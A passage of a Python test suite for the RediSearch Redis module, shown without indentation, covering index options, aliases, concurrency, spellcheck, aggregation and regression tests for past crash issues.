d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])
if not env.is_cluster():
env.assertEquals(int(d['num_docs']), N)
env.assertEquals(int(d['num_terms']), N + 1)
env.assertEquals(int(d['max_doc_id']), N)
env.assertEquals(int(d['records_per_doc_avg']), 2)
env.assertEquals(int(d['num_records']), N * 2)
env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
env.assertGreater(float(d['key_table_size_mb']), 0)
env.assertGreater(float(d['inverted_sz_mb']), 0)
env.assertGreater(float(d['bytes_per_record_avg']), 0)
env.assertGreater(float(d['doc_table_size_mb']), 0)
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
combo = list(filter(None, combo))
options = combo + ['schema', 'f1', 'text']
try:
env.cmd('ft.drop', 'idx')
except:
pass
env.assertCmdOk('ft.create', 'idx', *options)
info = env.cmd('ft.info', 'idx')
ix = info.index('index_options')
env.assertFalse(ix == -1)
opts = info[ix + 1]
# make sure that an empty opts string returns no options in
# info
if not combo:
env.assertListEqual([], opts)
for option in filter(None, combo):
env.assertTrue(option in opts)
def testNoStem(env):
env.cmd('ft.create', 'idx', 'schema', 'body',
'text', 'name', 'text', 'nostem')
for _ in env.retry_with_reload():
try:
env.cmd('ft.del', 'idx', 'doc')
except redis.ResponseError:
pass
# Insert a document
env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
'body', "located",
'name', "located")
# Now search for the fields
res_body = env.cmd('ft.search', 'idx', '@body:location')
res_name = env.cmd('ft.search', 'idx', '@name:location')
env.assertEqual(0, res_name[0])
env.assertEqual(1, res_body[0])
def testSearchNonexistField(env):
# GH Issue 133
env.cmd('ft.create', 'idx', 'schema', 'title', 'text',
'weight', 5.0, 'body', 'text', 'url', 'text')
env.cmd('ft.add', 'idx', 'd1', 1.0, 'nosave', 'fields', 'title',
'hello world', 'body', 'lorem dipsum', 'place', '-77.0366 38.8977')
env.cmd('ft.search', 'idx', 'Foo', 'GEOFILTER',
'place', '-77.0366', '38.8977', '1', 'km')
def testSortbyMissingField(env):
# GH Issue 131
env.cmd('ft.create', 'ix', 'schema', 'txt',
'text', 'num', 'numeric', 'sortable')
env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
# GH Issue 207
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
from threading import Thread
env.getConnection()
ndocs = 100
def runner(tid):
cli = env.getConnection()
for num in range(ndocs):
cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
'fields', 'txt', 'hello world' * 20)
ths = []
for tid in range(10):
ths.append(Thread(target=runner, args=(tid,)))
[th.start() for th in ths]
[th.join() for th in ths]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
# Tests issue #210
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc1', 1.0,
'fields', 'txt', 'goodbye world')
env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])
# Now with replace
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
'fields', 'txt', 'goodbye world')
env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
from multiprocessing import Process
import random
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
docs_per_thread = 100
num_threads = 50
docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]
def thrfn():
myIds = docIds[::]
random.shuffle(myIds)
cli = env.getConnection()
with cli.pipeline(transaction=False) as pl:
for x in myIds:
pl.execute_command('ft.add', 'idx', x, 1.0,
'fields', 'txt', ' hello world ' * 50)
try:
pl.execute()
except Exception as e:
pass
# print e
thrs = [Process(target=thrfn) for x in range(num_threads)]
[th.start() for th in thrs]
[th.join() for th in thrs]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
# Insert a document
env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
for _ in env.reloading_iterator():
exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
res = env.cmd('ft.search', 'idx', 'match')
env.assertEqual(exp, res)
def testNonDefaultDb(env):
if env.is_cluster():
raise unittest.SkipTest()
# Should be ok
env.cmd('FT.CREATE', 'idx1', 'schema', 'txt', 'text')
try:
env.cmd('SELECT 1')
except redis.ResponseError:
return
# Should fail
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx2', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
env.cmd('FT.CREATE', 'idx', 'schema', 'txt', 'text')
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'fields',
'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3')
res = env.cmd('ft.get', 'idx', 'doc')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertTrue(res['f1'] in ('f1val', 'f1val2'))
env.assertEqual('f1Val3', res['F1'])
def testDuplicateFields(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'txt',
'TEXT', 'num', 'NUMERIC', 'SORTABLE')
for _ in env.retry_with_reload():
# Ensure the index assignment is correct after an rdb load
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
'txt', 'foo', 'txt', 'bar', 'txt', 'baz')
# Try add hash
env.hmset('newDoc', {'txt': 'foo', 'Txt': 'bar', 'txT': 'baz'})
# Get the actual value:
from redis import ResponseError
if not env.is_cluster():
with env.assertResponseError(contained='twice'):
env.cmd('FT.ADDHASH', 'idx', 'newDoc', 1.0)
# Try with REPLACE
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE', 'FIELDS',
'txt', 'foo', 'txt', 'bar')
# With replace partial
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42)
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42, 'num', 32)
def testDuplicateSpec(env):
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1',
'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
# Note, the document needs to have one present sortable field in
# order for the indexer to give it a sort vector
env.cmd('ft.create', 'idx', 'SCHEMA', 'lastName', 'text',
'SORTABLE', 'firstName', 'text', 'SORTABLE')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
"firstName", "ASC", "limit", 0, 100)
# commented because we don't filter out exclusive sortby fields
# env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
if env.is_cluster():
raise unittest.SkipTest()
# Ensure we can work in Lua and Multi environments without crashing
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)
r = env.getConnection()
r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)
# Try in a pipeline:
with r.pipeline(transaction=True) as pl:
pl.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'f1', 'v3')
pl.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'f1', 'v4')
pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
pl.execute()
def testLanguageField(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'language', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
'FIELDS', 'language', 'gibberish')
res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
# The only way I can verify that LANGUAGE is parsed twice is ensuring we
# provide a wrong language. This is much easier to test than trying to
# figure out how a given word is stemmed
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
# This would previously crash
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
for x in range(2000):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(
x), 1.0, 'FIELDS', 'f1', 'HELLO')
env.broadcast('SAVE')
for x in range(10):
env.broadcast('DEBUG RELOAD')
def normalize_row(row):
return to_dict(row)
def assertAggrowsEqual(env, exp, got):
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
# and now, it's just free form:
exp = sorted(to_dict(x) for x in exp[1:])
got = sorted(to_dict(x) for x in got[1:])
env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
from pprint import pprint
# pprint(exp)
# pprint(got)
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
exp = list(grouper(exp[1:], 2))
got = list(grouper(got[1:], 2))
for x in range(len(exp)):
exp_did, exp_fields = exp[x]
got_did, got_fields = got[x]
env.assertEqual(exp_did, got_did, message="at position {}".format(x))
got_fields = to_dict(got_fields)
exp_fields = to_dict(exp_fields)
env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
def testAlterIndex(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx', 'world')
env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
for x in range(10):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))
for _ in env.retry_with_reload():
# Test that sortable works
res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'], 'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'], 'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', [
'f1', 'hello', 'f3', 'val4'], 'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'], 'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
assertResultsEqual(env, exp, res)
# Test that we can add a numeric field
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
for _ in env.retry_with_reload():
res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
env.assertEqual([1, 'docN1', ['n1', '50']], res)
def testAlterValidation(env):
# Test that constraints for ALTER comand
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'f0', 'TEXT')
for x in range(1, 32):
env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
# OK for now.
# Should be too many indexes
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')
env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'SCHEMA', 'f0', 'TEXT')
# print env.cmd('FT.INFO', 'idx2')
for x in range(1, 50):
env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')
env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)
env.cmd('FT.CREATE', 'idx3', 'SCHEMA', 'f0', 'text')
# Try to alter the index with garbage
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
ret = to_dict(env.cmd('ft.info', 'idx3'))
env.assertEqual(1, len(ret['fields']))
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_1(env):
if env.is_cluster():
raise unittest.SkipTest('ADDHASH unsupported!')
# Test random RDB regressions, see GH 366
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.hmset('foo', {'textfield': 'blah', 'numfield': 1})
env.cmd('FT.ADDHASH', 'idx1', 'foo', 1, 'replace')
env.cmd('FT.DEL', 'idx1', 'foo')
for _ in env.retry_with_reload():
pass # --just ensure it doesn't crash
def testIssue366_2(env):
# FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
# shutdown
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
env.cmd('ft.add', 'idx1', 'doc1', 1,
'PAYLOAD', '{"hello":"world2"}',
'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
for _ in env.retry_with_reload():
pass #
def testIssue654(env):
# Crashes during FILTER
env.cmd('ft.create', 'idx', 'schema', 'id', 'numeric')
env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
env.cmd('FT.CREATE', 'idx2', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
# Create a document and then replace it.
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's100', 'numfield', 990)
env.dump_and_reload()
# RDB Should still be fine
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's200', 'numfield', 1090)
doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
env.assertEqual('s200', doc['textfield'])
env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
command = ['ft.create', 'idx', 'schema']
for x in range(255):
command += ['t{}'.format(x), 'numeric', 'sortable']
command = command[:-1]
env.cmd(*command)
for _ in env.reloading_iterator():
try:
env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
except redis.ResponseError as e:
env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'WEIGHT', '5.0',
'body', 'TEXT',
'url', 'TEXT')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'bod', 'lorem ipsum', 'url', 'www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'no-as')
env.assertEqual([0], rv)
def testIssue446(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'SORTABLE')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([1], rv)
# Related - issue 635
env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([2], rv)
def testTimeoutSettings(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
def testAlias(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.create', 'idx2', 'schema', 't1', 'text')
env.cmd('ft.aliasAdd', 'myIndex', 'idx')
env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'idx', 'hello')
env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
r2 = env.cmd('ft.search', 'myIndex', 'hello')
env.assertEqual(r, r2)
# try to add the same alias again; should be an error
env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
# now delete the index
env.cmd('ft.drop', 'myIndex')
# index list should be cleared now. This can be tested by trying to alias
# the old alias to different index
env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
env.cmd('ft.aliasAdd', 'alias2', 'idx2')
env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'alias2', 'hello')
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# check that aliasing one alias to another returns an error. This will
# end up being confusing
env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()
# check that deleting the alias works as expected
env.expect('ft.aliasDel', 'myIndex').notRaiseError()
env.expect('ft.search', 'myIndex', 'foo').raiseError()
# create a new index and see if we can use the old name
env.cmd('ft.create', 'idx3', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
# also, check that this works in rdb save
for _ in env.retry_with_rdb_reload():
r = env.cmd('ft.search', 'myIndex', 'foo')
env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)
# Check that we can move an alias from one index to another
env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
r = env.cmd('ft.search', 'myIndex', "hello")
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# Test that things like ft.get, ft.aggregate, etc. work
r = env.cmd('ft.get', 'myIndex', 'doc2')
env.assertEqual(['t1', 'hello'], r)
r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
env.assertEqual([1, ['t1', 'hello']], r)
r = env.cmd('ft.del', 'myIndex', 'doc2')
env.assertEqual(1, r)
def testNoCreate(env):
env.cmd('ft.create', 'idx', 'schema', 'f1', 'text')
env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
# Standalone functionality
def testIssue484(env):
# Issue with split
# 127.0.0.1:6379> ft.drop productSearch1
# OK
# 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'schema', 'productid',
'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
'load', '2', '@color', '@categoryid',
'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
'GROUPBY', '1', '@value',
'REDUCE', 'COUNT', '0', 'as', 'value_count',
'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
assertAggrowsEqual(env, expected, res)
for var in expected:
env.assertIn(var, res)
def testIssue501(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
env.assertEqual([], rv[0][2])
def testIssue589(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
env.expect('ft.create', 'test', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
env.expect('ft.search', 'test', '@uuid:{foo}').equal([1L, 'a', ['uuid', 'foo', 'title', 'bar']])
# Server crash on doc names that conflict with index keys #666
def testIssue666(env):
env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')
# crashes here
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
# try with replace:
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testPrefixDeletedExpansions(env):
from unittest import SkipTest
# first get the gc implementation. This doesn't work on forkgc currently
gcp = env.cmd('ft.config', 'get', 'gc_policy')[0][1]
if gcp.lower() == 'fork':
raise SkipTest('test not supported on fork gc')
env.cmd('ft.create', 'idx', 'schema', 'txt1', 'text', 'tag1', 'tag')
# get the number of maximum expansions
maxexpansions = int(env.cmd('ft.config', 'get', 'maxexpansions')[0][1])
for x in range(maxexpansions):
env.cmd('ft.add', 'idx', 'doc{}'.format(x), 1, 'fields',
'txt1', 'term{}'.format(x), 'tag1', 'tag{}'.format(x))
for x in range(maxexpansions):
env.cmd('ft.del', 'idx', 'doc{}'.format(x))
env.cmd('ft.add', 'idx', 'doc_XXX', 1, 'fields', 'txt1', 'termZZZ', 'tag1', 'tagZZZ')
# r = env.cmd('ft.search', 'idx', 'term*')
# print(r)
# r = env.cmd('ft.search', 'idx', '@tag1:{tag*}')
# print(r)
tmax = time.time() + 0.5 # 250ms max
iters = 0
while time.time() < tmax:
iters += 1
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
if r[0]:
break
print 'did {} iterations'.format(iters)
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
env.assertEqual([1, 'doc_XXX', ['txt1', 'termZZZ', 'tag1', 'tagZZZ']], r)
def testOptionalFilter(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
for x in range(100):
env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields', 't1', 'hello world word{}'.format(x))
print env.cmd('ft.explain', 'idx', '(~@t1:word20)')
# print(r)
r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
print(r)
def testIssue736(env):
# 1. create the schema, we need a tag field
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'n2', 'numeric', 't2', 'tag')
# 2. create a single document to initialize at least one RSAddDocumentCtx
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 't2', 'foo, bar')
# 3. create a second document with many filler fields to force a realloc:
extra_fields = []
for x in range(20):
extra_fields += ['nidx_fld{}'.format(x), 'val{}'.format(x)]
extra_fields += ['n2', 'not-a-number', 't2', 'random, junk']
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', *extra_fields)
